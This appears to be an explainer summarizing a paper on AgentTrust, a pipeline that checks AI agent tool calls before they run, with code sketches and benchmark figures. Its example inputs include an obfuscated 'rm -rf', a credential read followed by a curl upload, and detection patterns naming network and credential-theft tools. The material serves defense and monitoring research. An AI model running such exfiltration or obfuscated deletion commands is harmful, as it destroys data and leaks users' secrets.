Agent Safety · Runtime Governance

Every tool call
before it fires.

The standard approach to agent safety is to measure what agents did after they did it. Chenglin Yang built something different: a pipeline that intercepts every tool call before execution, deobfuscates shell payloads, tracks multi-step attack patterns across a session, and returns a structured verdict. Not a sandbox. Not a post-hoc audit. A gate.

First surfaced in Tandemly Briefing — 2026-05-22.

Core concept

Runtime interception: evaluating the semantic meaning of an agent action before execution, not after. The verdict (allow, warn, block, review) arrives in milliseconds, while there is still time to stop the action.

01 The problem

Post-hoc safety
is too late.

File deletion is immediate. Exfiltrated credentials have already left the system. Measuring agent behavior after execution catches patterns in logs. It does not stop the action.

The standard safety evaluation paradigm for AI agents works like a flight data recorder. It captures what happened during the flight. It is useful for investigation and for training future systems. It is not useful for stopping a crash that is in progress.

The tools that act before execution have their own gaps. Static guardrails match keywords in tool call parameters, but shell commands can be obfuscated in ways that defeat keyword matching entirely. A command that recursively deletes a directory tree can be written through variable substitution, hex escape sequences, command chaining, or ANSI-C quoting such that no pattern in the raw string reveals what it does. Catching it requires expanding the command into its plaintext form first. Most static guardrails skip that step.
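To make the obfuscation gap concrete, here is a minimal sketch of the expand-then-match idea. It covers only three of the techniques named above (ANSI-C quoting with hex and octal escapes, adjacent-quote concatenation, and simple variable substitution). The function names and regexes are illustrative assumptions, not AgentTrust's ShellNormalizer, and a real normalizer would need a proper shell parser.

```python
import re

def _decode_ansi_c(match):
    """Decode \\xHH hex and \\NNN octal escapes inside a $'...' string."""
    body = match.group(1)
    body = re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), body)
    body = re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), body)
    return body

def _expand_variables(command):
    """Apply simple NAME=value assignments to later $NAME / ${NAME} uses."""
    env, kept = {}, []
    for segment in command.split(";"):
        segment = segment.strip()
        assignment = re.fullmatch(r"([A-Za-z_]\w*)=(\S*)", segment)
        if assignment:
            env[assignment.group(1)] = assignment.group(2)
            continue
        kept.append(re.sub(
            r"\$\{?([A-Za-z_]\w*)\}?",
            lambda m: env.get(m.group(1), m.group(0)),  # leave unknown names as-is
            segment,
        ))
    return "; ".join(kept)

def normalize(command):
    """Hypothetical normalizer: expand a command before any keyword matching."""
    # ANSI-C quoting: $'\x72\x6d' becomes rm
    command = re.sub(r"\$'([^']*)'", _decode_ansi_c, command)
    # Adjacent-quote concatenation: 'r''m' becomes rm (whitespace-free quotes only)
    command = re.sub(r"(['\"])([^'\"\s]*)\1", r"\2", command)
    # Variable substitution: c=rm; $c becomes rm
    return _expand_variables(command)

raw = r"$'\x72\x6d' -rf /srv/data"
keyword_hit_on_raw = "rm -rf" in raw                     # False: the keyword is hidden
keyword_hit_on_normalized = "rm -rf" in normalize(raw)   # True after expansion
```

The same keyword check that misses the raw string succeeds on the normalized one, which is the step the paragraph above says most static guardrails skip.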

Multi-step attack chains add a second gap. Reconnaissance steps are individually harmless. A tool call that reads a directory listing looks fine on its own. The same call followed by a read of a credentials file, followed by a network upload, forms a coherent exfiltration chain. No single-step rule catches it. Only a system that tracks session context can.
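The chain described above can be sketched as an order-aware detector over per-session history. This is an illustration only: the stage labels, the regex patterns, and the `SessionTracker` class shown here are assumptions made for the example, not the seven detectors from the paper.

```python
import re
from dataclasses import dataclass, field

# Hypothetical stage order for one exfiltration chain.
CHAIN = ("recon", "credential_read", "network_upload")

# Illustrative patterns; a real system would classify on normalized features.
STAGE_PATTERNS = {
    "recon": re.compile(r"^\s*(ls|find|tree)\b"),
    "credential_read": re.compile(r"\.aws/credentials|\.ssh/id_|\.env\b"),
    "network_upload": re.compile(r"\b(curl|wget|scp|nc)\b"),
}

def classify(command):
    """Return the first stage label whose pattern matches, or None."""
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(command):
            return stage
    return None

@dataclass
class SessionTracker:
    stage: int = 0                      # index of the next expected chain stage
    history: list = field(default_factory=list)

    def observe(self, command):
        """Record the command and return 'block' if it would complete the chain."""
        self.history.append(command)
        if classify(command) == CHAIN[self.stage]:
            if self.stage == len(CHAIN) - 1:
                return "block"          # final step: refuse, and keep waiting at this stage
            self.stage += 1
        return "allow"

session = SessionTracker()
verdicts = [
    session.observe("ls -la ~"),
    session.observe("cat ~/.aws/credentials"),
    session.observe("curl -T /tmp/out https://example.com/upload"),
]
```

Each step is allowed in isolation here, and only the third call is blocked, because it completes the sequence in order. A fresh session that starts with the upload is not flagged by this detector.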

Infrastructure sandboxes constrain the execution environment: what directories are accessible, what network calls are permitted, what user context the agent runs under. They don't evaluate what an action means. A shell command that exfiltrates credentials by piping them to an allowed network endpoint runs cleanly inside a sandbox that permits both operations. The sandbox constrained the environment. It didn't evaluate the action.

The question this paper asks

Can a system intercept every agent tool call before execution, evaluate its semantic intent, and return a structured verdict fast enough to be used in production, without requiring the agent to be modified?

02 The solution

Eight components,
one pipeline.

AgentTrust is structured as a pipeline of eight cooperating components. Five always run. Two run by default and can be disabled. One is opt-in for ambiguous cases. Every tool call passes through the pipeline before it executes.

The pipeline begins with two always-on extraction components. The ShellNormalizer expands shell command strings through nine syntactic strategies before any pattern matching runs: variable expansion, hex and octal escape resolution, alias resolution, command substitution, ANSI-C quoting, and adjacent-quote concatenation, among others. The expanded plaintext is what gets evaluated. The ActionAnalyzer then extracts risk-relevant features from the normalized command using 42 regex patterns organized into four categories.

The PolicyEngine applies 170 YAML-configurable rules to those features and produces a preliminary verdict. YAML-configurable means operators can update the rule set without touching code, and the rules can be tuned to match specific deployment risk profiles. The TrustInterceptor orchestrates the full pipeline, and the TrustReporter produces a structured, human-readable explanation of the verdict.
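A minimal sketch of rules-as-data evaluation, to show why this separation lets operators change policy without touching code. The rules are written here as Python dictionaries standing in for what would be YAML entries. The rule ids, feature names, and the "most severe verdict wins" precedence are all assumptions for illustration, not the paper's schema.

```python
# Assumed precedence: when several rules match, the most severe verdict wins.
SEVERITY = {"allow": 0, "warn": 1, "review": 2, "block": 3}

# Hypothetical rules; in a YAML-driven engine these would be loaded from a file.
RULES = [
    {"id": "fs-recursive-delete", "when": {"recursive_delete"}, "verdict": "block"},
    {"id": "net-outbound-upload", "when": {"network_upload"}, "verdict": "warn"},
    {"id": "cred-then-upload", "when": {"credential_read", "network_upload"}, "verdict": "block"},
    {"id": "sys-config-write", "when": {"system_config_write"}, "verdict": "review"},
]

def evaluate(features, rules=RULES):
    """Return (verdict, matched_rule_ids) for a set of extracted feature names."""
    # A rule matches when every feature it requires is present.
    matched = [rule for rule in rules if rule["when"] <= features]
    if not matched:
        return "allow", []
    top = max(matched, key=lambda rule: SEVERITY[rule["verdict"]])
    return top["verdict"], [rule["id"] for rule in matched]

upload_only = evaluate({"network_upload"})
upload_after_cred = evaluate({"credential_read", "network_upload"})
```

Because the engine only interprets data, tightening the policy means editing a rule entry, for example changing `net-outbound-upload` from `warn` to `review`, rather than changing `evaluate`.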

ShellNormalizer + ActionAnalyzer (always-on)

Nine deobfuscation strategies expand a shell command to its plaintext equivalent before evaluation. Then 42 regex patterns across four categories extract risk-relevant features from the normalized text. Obfuscated payloads are decoded before any rule runs.

PolicyEngine + TrustInterceptor + TrustReporter (always-on)

170 YAML-configurable rules apply to the extracted features. The TrustInterceptor orchestrates the full pipeline and produces the final verdict. The TrustReporter formats a human-readable explanation of why the action received the verdict it did.

SafeFixEngine + SessionTracker / RiskChain (opt-out)

SafeFixEngine applies 37 fix rules to generate safer alternatives for blocked actions. Instead of just blocking, it proposes what the agent could do instead. SessionTracker maintains per-session action history and applies seven order-aware detectors to catch multi-step attack chains that no single-step rule would flag.

LLMJudge (opt-in)

A cache-aware incremental LLM-as-Judge handles semantically ambiguous cases that rule-based analysis cannot resolve with high confidence. It uses a five-dimension evaluation framework. The cache is bounded by size and time-to-live to keep latency low when the same or similar action recurs.
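A cache bounded by both size and time-to-live can be sketched in a few lines. This is a generic LRU-plus-TTL cache keyed on an exact string, written as an assumption about how such a bound might work. It does not reproduce the paper's cache or its handling of "similar" actions, and the class name and defaults are hypothetical.

```python
import time
from collections import OrderedDict

class VerdictCache:
    """Hypothetical judge-verdict cache: least-recently-used eviction plus expiry."""

    def __init__(self, max_entries=1024, ttl_seconds=300.0, clock=time.monotonic):
        self._entries = OrderedDict()   # key -> (stored_at, verdict)
        self._max = max_entries
        self._ttl = ttl_seconds
        self._clock = clock             # injectable so expiry can be tested

    def get(self, key):
        entry = self._entries.get(key)
        if entry is None:
            return None
        stored_at, verdict = entry
        if self._clock() - stored_at > self._ttl:
            del self._entries[key]      # expired: drop it and report a miss
            return None
        self._entries.move_to_end(key)  # mark as most recently used
        return verdict

    def put(self, key, verdict):
        self._entries[key] = (self._clock(), verdict)
        self._entries.move_to_end(key)
        while len(self._entries) > self._max:
            self._entries.popitem(last=False)  # evict the least recently used entry

    def __len__(self):
        return len(self._entries)
```

On a hit the expensive judge call is skipped entirely. The size bound caps memory, and the TTL keeps a stale verdict from outliving a policy change indefinitely.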

The four verdicts are allow, warn, block, and review. Warn lets the action proceed with a logged flag. Block stops it. Review routes it for human inspection before execution continues. The output is a structured TrustReport, not a binary pass or fail. The structured output means downstream systems can act on the verdict type differently rather than applying a single response to any non-allow case.

The MCP server interface is the deployment detail that matters most for practical adoption. Because AgentTrust exposes itself as a Model Context Protocol server, it can interpose between any MCP-compatible agent and its tools without patching the agent itself. The agent sees the same tool interface. The interceptor sits invisibly between the call and the execution.
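The interposition pattern can be sketched without any MCP machinery: wrap the tool in a function with the same signature that consults an evaluator first and dispatches on the verdict. Everything named here (`Verdict`, `TrustReport` fields, `intercept`, the exception types) is an assumption for illustration. It is not the AgentTrust API and not an MCP SDK call.

```python
from dataclasses import dataclass
from enum import Enum

class Verdict(Enum):
    ALLOW = "allow"
    WARN = "warn"
    BLOCK = "block"
    REVIEW = "review"

@dataclass
class TrustReport:
    """Hypothetical structured verdict: a verdict type plus a readable reason."""
    verdict: Verdict
    reason: str

class ActionBlocked(Exception):
    pass

class ReviewRequired(Exception):
    pass

def intercept(tool, evaluate, log=print):
    """Wrap `tool` so every call is evaluated before it executes."""
    def guarded(command):
        report = evaluate(command)
        if report.verdict is Verdict.BLOCK:
            raise ActionBlocked(report.reason)      # the tool never runs
        if report.verdict is Verdict.REVIEW:
            raise ReviewRequired(report.reason)     # hand off to a human first
        if report.verdict is Verdict.WARN:
            log(f"warn: {report.reason}")           # proceed, but leave a flag
        return tool(command)
    return guarded

def toy_evaluate(command):
    """Stand-in evaluator used only to exercise the wrapper."""
    if "rm -rf" in command:
        return TrustReport(Verdict.BLOCK, "recursive delete")
    return TrustReport(Verdict.ALLOW, "no rule matched")

guarded_shell = intercept(lambda command: f"ran: {command}", toy_evaluate)
```

The caller still invokes `guarded_shell(command)` exactly as it would the original tool, which is the property that lets an interceptor be added without modifying the agent.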

What SafeFix changes

Most agent safety tooling is binary: allow or block. SafeFix is the part that makes the system constructive rather than obstructionist. An agent that was about to run a recursive delete gets back a suggestion to move the target to trash instead. This keeps the agent functional while reducing blast radius. The 37 fix rules map to the most common blocked action patterns.
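The recursive-delete example can be sketched as a single fix rule. The function below is a hypothetical illustration of the block-plus-alternative idea, assuming a trash directory at `~/.trash`. It is not one of the paper's 37 rules.

```python
import shlex

def suggest_fix(command, trash_dir="~/.trash"):
    """Return a safer alternative for a recursive rm, or None if no fix applies."""
    tokens = shlex.split(command)
    if not tokens or tokens[0] != "rm":
        return None
    flags = [t for t in tokens[1:] if t.startswith("-")]
    targets = [t for t in tokens[1:] if not t.startswith("-")]
    # Short flags such as -r, -R, -rf, or the long form --recursive.
    recursive = "--recursive" in flags or any(
        "r" in flag.lower() for flag in flags if not flag.startswith("--")
    )
    if not recursive or not targets:
        return None
    quoted = " ".join(shlex.quote(target) for target in targets)
    # trash_dir is left unquoted on purpose so the shell still expands "~".
    return f"mv -- {quoted} {trash_dir}"

alternative = suggest_fix("rm -rf /srv/data")
```

Returning `None` for commands the rule does not cover keeps the fix step optional: the block verdict stands either way, and the suggestion is attached only when one exists.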

03 Findings

95% verdict accuracy
at millisecond latency.

Two benchmarks. One internal, designed to cover the six primary risk categories evenly. One external, built separately from the internal set and drawn from real-world adversarial scenarios. Both tested the production configuration without the LLMJudge component.

Verdict accuracy (internal)

95.0%

300 scenarios, 6 risk categories

Verdict accuracy (external)

96.7%

630 real-world adversarial scenarios

Shell obfuscation accuracy

~93%

Obfuscated payload subset of external benchmark

What the benchmarks cover

Internal: 300 scenarios, 50 each across file operations, network access, code execution, credential exposure, data exfiltration, and system configuration. Includes safe development workflows, moderate-risk DevOps operations, dangerous attacks, and obfuscated evasion attempts.

What the numbers mean

External: 630 independently constructed real-world adversarial scenarios across DevOps, cloud, container, and supply-chain operations. Built separately from the internal benchmark, which is why 96.7% on the external set matters: the system wasn't tuned against it.

The two-number gap: 95.0% vs 73.7%

The internal benchmark reports two accuracy figures: 95.0% verdict accuracy and 73.7% risk-level accuracy. Verdict accuracy is the security-critical one. Getting the right verdict (block, warn, allow, review) is what stops harmful actions. Risk-level accuracy measures whether the system calibrated the severity correctly within a verdict category, which matters for logging, alerting, and operator prioritization. 73.7% is a useful directional signal on severity, not a precise score to act on mechanically.
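A small sketch of how the two figures can diverge on the same records. The sample data and the risk-level names are invented for illustration. The closing arithmetic assumes both reported figures are computed over all 300 internal scenarios, which the summary above does not state explicitly.

```python
def accuracies(records):
    """records: (expected_verdict, got_verdict, expected_risk, got_risk) tuples.

    Returns (verdict_accuracy, risk_level_accuracy) as fractions.
    """
    records = list(records)
    verdict_hits = sum(1 for ev, gv, _, _ in records if ev == gv)
    risk_hits = sum(1 for _, _, er, gr in records if er == gr)
    return verdict_hits / len(records), risk_hits / len(records)

# Illustrative records only: every verdict is right, one severity is off.
sample = [
    ("block", "block", "critical", "critical"),
    ("block", "block", "critical", "high"),
    ("warn", "warn", "medium", "medium"),
    ("allow", "allow", "low", "low"),
]
verdict_acc, risk_acc = accuracies(sample)

# Under the 300-scenario assumption, the reported percentages correspond to
# 285 correct verdicts and about 221 correct risk levels.
reported_verdict_pct = round(285 / 300 * 100, 1)
reported_risk_pct = round(221 / 300 * 100, 1)
```

The second sample record is the case the gap describes: the action is still blocked, so the gate works, but the logged severity is one step too low.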

The 73.7% figure is a candid one. Safety tooling often reports a single accuracy number on its best-performing task. Reporting both figures, and explaining the gap, gives operators a calibrated expectation of what the system actually provides.

Latency: why it matters for production

The system achieves low-millisecond median end-to-end latency on the production configuration. That figure matters because a safety interceptor that adds hundreds of milliseconds to every tool call will either be disabled by operators or will make agents noticeably slower in ways users observe. Low-millisecond overhead is smaller than network call variance for typical tool execution. The interceptor is practically invisible in the latency budget.
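To check the overhead claim against your own rule set, a median-latency probe is enough to start with. This sketch times any evaluator callable. The function name and the stand-in evaluator are assumptions, and the numbers it produces describe your machine and configuration, not the paper's setup.

```python
import statistics
import time

def median_overhead_ms(evaluate, commands, repeats=5):
    """Median wall-clock time per evaluate(command) call, in milliseconds."""
    samples = []
    for _ in range(repeats):
        for command in commands:
            start = time.perf_counter()
            evaluate(command)
            samples.append((time.perf_counter() - start) * 1000.0)
    return statistics.median(samples)

# Stand-in evaluator; replace with a call into the interceptor under test.
def toy_evaluate(command):
    return "block" if "rm -rf" in command else "allow"

overhead = median_overhead_ms(toy_evaluate, ["ls -la", "rm -rf /srv/data", "git status"])
```

The median is used rather than the mean so that a single slow call, such as a cold cache, does not dominate the result. Tail percentiles are worth tracking separately before relying on the figure.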

Scope and limitations

Both benchmarks were constructed by the author. Independent external replication on a broader distribution of real production agent logs would give higher confidence in the generalization claim. The LLMJudge component is opt-in and excluded from the primary results, so the headline figures do not reflect its contribution on ambiguous cases. AGPL-3.0 licensing also limits commercial deployments that cannot disclose source.

04 Practical takeaways

What this means
for building agents.

Runtime interception is a distinct safety layer that neither sandbox restrictions nor post-hoc audits provide. For builders operating agents in production, this paper frames the gap and offers a concrete pattern to fill it.

For builders deploying agents with tool access

Treat sandbox and interceptor as complementary, not substitutes. The sandbox constrains what environment the agent runs in. The interceptor evaluates what each action means in that environment. You need both layers, covering different threat surfaces.

For MCP-stack operators

AgentTrust ships as an MCP server, which means it can sit between any MCP-compatible agent and its tools with no agent-side modifications. If your current stack already uses MCP tool registration, the integration path is adding AgentTrust as the intermediary in that chain rather than patching every tool individually.

For governance teams writing agent policies

The 170-rule YAML PolicyEngine is the governance artifact here. Rules can be updated without code changes. This means agent safety policy can be maintained by operations or security teams rather than requiring engineering involvement on every update. The YAML format also makes rules auditable and version-controllable.

On the SafeFix pattern

The most underappreciated piece in the paper is SafeFix: 37 rules that generate safer alternatives rather than just blocking. An agent that receives a constructive alternative can recover and complete its task. An agent that receives only a block has to decide whether to retry differently or fail. For autonomous agents operating without human supervision, the difference between a block and a SafeFix response is the difference between task failure and task completion.

On reading the two accuracy numbers

95.0% verdict accuracy is a reliable signal for blocking decisions. 73.7% risk-level accuracy is directionally useful for alert prioritization and logging, not for mechanical risk scoring. Use the verdict for the security-critical gate. Use the risk level for operator triage.

05 Further exploration

Where to go
from here.

Next steps if you want to go deeper on runtime agent safety.

Read the paper

Yang, C. (2026). AgentTrust: Runtime Safety Evaluation and Interception for AI Agent Tool Use. arXiv:2605.04785. The architecture section walks through the eight components in detail, including the nine deobfuscation strategies and the five-dimension LLMJudge evaluation framework.

Audit your tool call surface first

Before deploying, inventory every tool your agent can call and classify each against the six risk categories in the paper: file operations, network access, code execution, credential exposure, data exfiltration, system configuration. This classification exercise is the prerequisite to writing meaningful PolicyEngine rules that reflect your actual risk profile rather than the default ruleset.
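The inventory exercise can start as a plain mapping from tool name to risk categories, with a check for gaps. The tool names below are hypothetical. Only the six category names come from the text above.

```python
RISK_CATEGORIES = {
    "file operations",
    "network access",
    "code execution",
    "credential exposure",
    "data exfiltration",
    "system configuration",
}

# Hypothetical tool surface for one agent.
inventory = {
    "read_file": {"file operations"},
    "run_shell": {"file operations", "code execution", "system configuration"},
    "http_request": {"network access", "data exfiltration"},
    "summarize": set(),  # not yet classified
}

def audit(inventory):
    """Report tools with no category, unknown labels, and categories no tool touches."""
    covered = set().union(*inventory.values())
    return {
        "unclassified_tools": sorted(t for t, cats in inventory.items() if not cats),
        "unknown_labels": {
            tool: sorted(cats - RISK_CATEGORIES)
            for tool, cats in inventory.items()
            if cats - RISK_CATEGORIES
        },
        "categories_without_tools": sorted(RISK_CATEGORIES - covered),
    }

report = audit(inventory)
```

An unclassified tool is a prompt to decide deliberately that it is low risk, and a category with no tools suggests which default rules may be irrelevant to your deployment.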

Run the benchmarks on your configuration

The paper released both the 300-scenario internal and 630-scenario external benchmark sets. Running them against your deployment configuration before relying on the production ruleset gives you an accuracy baseline for your specific agent and tool combination rather than the paper's test setup.

Pair SafeFix rules with every block rule

For each block rule in your PolicyEngine, write the corresponding SafeFix rule that proposes a safer alternative. The goal is a system where the agent gets constructive guidance on what to do instead, not just a rejection. This is especially important for autonomous agents that can't escalate to a human mid-task.

Complement with longitudinal memory safety research

AgentTrust governs the action surface. The companion safety gap is the memory surface: how agent memory drifts over long deployments as stored facts become stale or contaminated. See STALE: When Agent Memory Becomes a Liability and ComplexMCP: Three Failure Modes in Large-Scale Tool Sandboxes for adjacent coverage.
